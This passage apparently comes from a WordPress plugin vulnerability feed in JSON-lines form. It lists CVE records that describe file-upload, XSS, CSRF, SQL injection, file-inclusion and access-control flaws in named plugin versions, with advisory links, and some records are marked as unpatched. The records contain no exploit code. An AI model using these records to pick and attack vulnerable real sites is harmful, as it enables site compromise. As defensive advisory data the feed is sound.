0.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peprodev-ups\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a881ca02-cef9-4f4b-8a62-e241c4c80004?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a881ca02-cef9-4f4b-8a62-e241c4c80004?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15043","slug":"wp-mobile-detector\/changelog","versionImpact":"3.5","description":"The WP Mobile Detector plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in resize.php file in versions up to, and including, 3.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/aadityapurani.com\\\/2016\\\/06\\\/03\\\/mobile-detector-poc\\\/\",\"name\":\"https:\\\/\\\/aadityapurani.com\\\/2016\\\/06\\\/03\\\/mobile-detector-poc\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2016\\\/06\\\/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2016\\\/06\\\/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mobile-detector\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mobile-detector\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4739674-eed4-417e-8c4d-2f5351b057cf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4739674-eed4-417e-8c4d-2f5351b057cf\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2016\\\/05\\\/31\\\/aribitrary-file-upload-vulnerability-in-wp-mobile-detector\\\/\",\"name\":\"https:\\\/\\\/www.pluginvulnerabilities.com\\\/2016\\\/05\\\/31\\\/aribitrary-file-upload-vulnerability-in-wp-mobile-detector\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d5dbd-36f0-4886-adf8-045ec9c2e306?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a5d5dbd-36f0-4886-adf8-045ec9c2e306?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1344","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the uucss_update_rule function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263153c9-61c5-4df4-803b-8d274e2a5e35\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263153c9-61c5-4df4-803b-8d274e2a5e35\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0894","slug":"restaurant-pickup-delivery-dine-in","versionImpact":"1.0.9","description":"The Pickup | Delivery | Dine-in date time WordPress plugin through 1.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42eff41-096f-401d-bbfb-dcd6e08faca5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42eff41-096f-401d-bbfb-dcd6e08faca5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25138","slug":"user-submitted-posts","versionImpact":"20190312.","description":"The User Submitted Posts plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the usp_check_images function in versions up to, and including, 20190312. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-submitted-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-submitted-posts\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a97877b-fb4d-4e87-bcff-56be65fee6ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a97877b-fb4d-4e87-bcff-56be65fee6ce?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-user-submitted-posts-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-user-submitted-posts-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1590","slug":"pagelayer","versionImpact":"1.8.2","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button Widget in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3749","slug":"sp-client-document-manager","versionImpact":"4.71","description":"The SP Project & Document Manager WordPress plugin through 4.71 lacks proper access controllers and allows a logged in user to view and download files belonging to another user","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d14bb16e-ce1d-4c31-8791-bc63174897c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d14bb16e-ce1d-4c31-8791-bc63174897c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4623","slug":"blogmentor","versionImpact":"1.5","description":"The Blogmentor \u2013 Blog Layouts for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018pagination_style\u2019 parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0925ceb-581c-4748-abfb-9962e53b7db9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0925ceb-581c-4748-abfb-9962e53b7db9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogmentor\\\/trunk\\\/includes\\\/elements\\\/blogmentor-blog-posts.php#L977\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogmentor\\\/trunk\\\/includes\\\/elements\\\/blogmentor-blog-posts.php#L977\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7692","slug":"flaming-forms","versionImpact":"1.0.1","description":"The Flaming Forms WordPress plugin through 1.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e9f98ef-5a44-4a0c-b9cd-ce750bec74f9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e9f98ef-5a44-4a0c-b9cd-ce750bec74f9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9307","slug":"mfolio-lite","versionImpact":"1.2.1","description":"The mFolio Lite plugin for WordPress is vulnerable to file uploads due to a missing capability check in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file or upload arbitrary EXE files on the affected site's server which may make remote code execution possible if the attacker can also gain access to run the .exe file, or trick a site visitor into downloading and running the .exe file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mfolio-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mfolio-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12605","slug":"ai-scribe-the-chatgpt-powered-seo-content-creation-wizard","versionImpact":"2.3","description":"The AI Scribe \u2013 SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the \"al_scribe_content_data\" actions. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L713\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L713\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52a8718f-2c4d-4da1-a81f-e93dff3fa43b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52a8718f-2c4d-4da1-a81f-e93dff3fa43b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1233","slug":"lafka-plugin","versionImpact":"7.1.0","description":"The Lafka Plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'lafka_options_upload' AJAX function in all versions up to, and including, 7.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the theme option that overrides the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lafka-fast-food-restaurant-woocommerce-theme\\\/23969682\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lafka-fast-food-restaurant-woocommerce-theme\\\/23969682\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/865b87a8-ab8a-4054-9e18-50693023cb96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/865b87a8-ab8a-4054-9e18-50693023cb96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3860","slug":"cardealerpress","versionImpact":"6.7.2504.00","description":"The CarDealerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018saleclass' parameter in all versions up to, and including, 6.7.2504.00 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardealerpress\\\/tags\\\/6.7.2412.00\\\/templates\\\/shortcode\\\/sc_inventory_counter.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardealerpress\\\/tags\\\/6.7.2412.00\\\/templates\\\/shortcode\\\/sc_inventory_counter.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cardealerpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cardealerpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ad38a3-adb1-4c82-8e8c-f5883ba0f10e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ad38a3-adb1-4c82-8e8c-f5883ba0f10e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4413","slug":"pixabay-images","versionImpact":"3.4","description":"The Pixabay Images plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the pixabay_upload function in all versions up to, and including, 3.4. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixabay-images\\\/trunk\\\/pixabay-images.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixabay-images\\\/trunk\\\/pixabay-images.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e71dea-d736-49c2-a630-f42905ac6b4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e71dea-d736-49c2-a630-f42905ac6b4d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1343","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the attach_rule function. This makes it possible for unauthenticated attackers to modify the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f74b86-a050-4247-b310-045bf48fd4bd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f74b86-a050-4247-b310-045bf48fd4bd\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0768","slug":"avirato-calendar","versionImpact":"5.0.5","description":"The Avirato hotels online booking engine WordPress plugin through 5.0.5 does not validate and escape some of its shortcode attributes before using them in SQL statement\/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03d061b4-1b71-44f5-b3dc-f82a5fcd92eb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03d061b4-1b71-44f5-b3dc-f82a5fcd92eb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15033","slug":"delete-all-comments","versionImpact":"2.0.","description":"The Delete All Comments plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the via the delete-all-comments.php file in versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e98d2d-20b1-4fff-96d4-0fb8e0d2615a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e98d2d-20b1-4fff-96d4-0fb8e0d2615a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"http:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin\\\/\",\"name\":\"http:\\\/\\\/blog.nintechnet.com\\\/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/delete-all-comments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/delete-all-comments\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3510","slug":"ftp-access","versionImpact":"1.0","description":"The FTP Access WordPress plugin through 1.0 does not have authorisation and CSRF checks when updating its settings and is missing sanitisation as well as escaping in them, allowing any authenticated users, such as subscriber to update them with XSS payloads, which will be triggered when an admin will view the settings of the plugin. The attack could also be perform via CSRF against any authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76abf4ac-5cc1-41a0-84c3-dff42c659581\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76abf4ac-5cc1-41a0-84c3-dff42c659581\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5199","slug":"php-to-page","versionImpact":"0.3","description":"The PHP to Page plugin for WordPress is vulnerable Local File Inclusion to Remote Code Execution in versions up to, and including, 0.3 via the 'php-to-page' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to include local file and potentially execute code on the server. While subscribers may need to poison log files or otherwise get a file installed in order to achieve remote code execution, author and above users can upload files by default and achieve remote code execution easily.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/php-to-page\\\/trunk\\\/php-to-page.php?rev=441028#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/php-to-page\\\/trunk\\\/php-to-page.php?rev=441028#L22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e5a0dc-fc51-4565-945f-190cf9175874?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e5a0dc-fc51-4565-945f-190cf9175874?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50371","slug":"advanced-page-visit-counter","versionImpact":"8.0.6","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Page Visit Counter Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress allows Stored XSS.This issue affects Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress: from n\/a through 8.0.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-8-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-8-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3748","slug":"sp-client-document-manager","versionImpact":"4.71","description":"The SP Project & Document Manager WordPress plugin through 4.71 is missing validation in its upload function, allowing a user to manipulate the `user_id` to make it appear that a file was uploaded by another user","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01427cfb-5c51-4524-9b9d-e09a603bc34c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01427cfb-5c51-4524-9b9d-e09a603bc34c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4870","slug":"frontend-registration-contact-form-7","versionImpact":"5.1","description":"The Frontend Registration \u2013 Contact Form 7 plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1 due to insufficient restriction on the '_cf7frr_' post meta. This makes it possible for authenticated attackers, with editor-level access and above, to modify the default user role in the registration form settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca616ae6-59d3-4037-b538-d371f007a037?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca616ae6-59d3-4037-b538-d371f007a037?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-registration-contact-form-7\\\/trunk\\\/frontend-registration-cf7.php?rev=2975770#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-registration-contact-form-7\\\/trunk\\\/frontend-registration-cf7.php?rev=2975770#L244\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4541","slug":"custom-product-list-table","versionImpact":"3.0.0","description":"The Custom Product List Table plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.0. This is due to missing or incorrect nonce validation when modifying products. This makes it possible for unauthenticated attackers to add, delete, bulk edit, approve or cancel products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c046e0c-32d2-47d1-9890-d05d69217161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c046e0c-32d2-47d1-9890-d05d69217161?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-product-list-table\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-product-list-table\\\/#description\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0619","slug":"payflex-payment-gateway","versionImpact":"2.5.0","description":"The Payflex Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the payment_callback() function in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to update the status of orders, which can potentially lead to revenue loss.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payflex-payment-gateway\\\/trunk\\\/partpay.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payflex-payment-gateway\\\/trunk\\\/partpay.php#L751\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6567","slug":"ebook-store","versionImpact":"5.8001","description":"The Ebook Store plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 5.8001. This is due to the plugin utilizing fpdi-protection and not preventing direct access to test files that have display_errors set to true. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebe431a7-b552-4891-9784-c6a7353228da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebe431a7-b552-4891-9784-c6a7353228da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/fpdi\\\/fpdi-protection-master\\\/local-tests\\\/simple.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/fpdi\\\/fpdi-protection-master\\\/local-tests\\\/simple.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7691","slug":"flaming-forms","versionImpact":"1.0.1","description":"The Flaming Forms WordPress plugin through 1.0.1 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d30a3b95-5d1f-4755-8b61-19946afc51ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d30a3b95-5d1f-4755-8b61-19946afc51ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
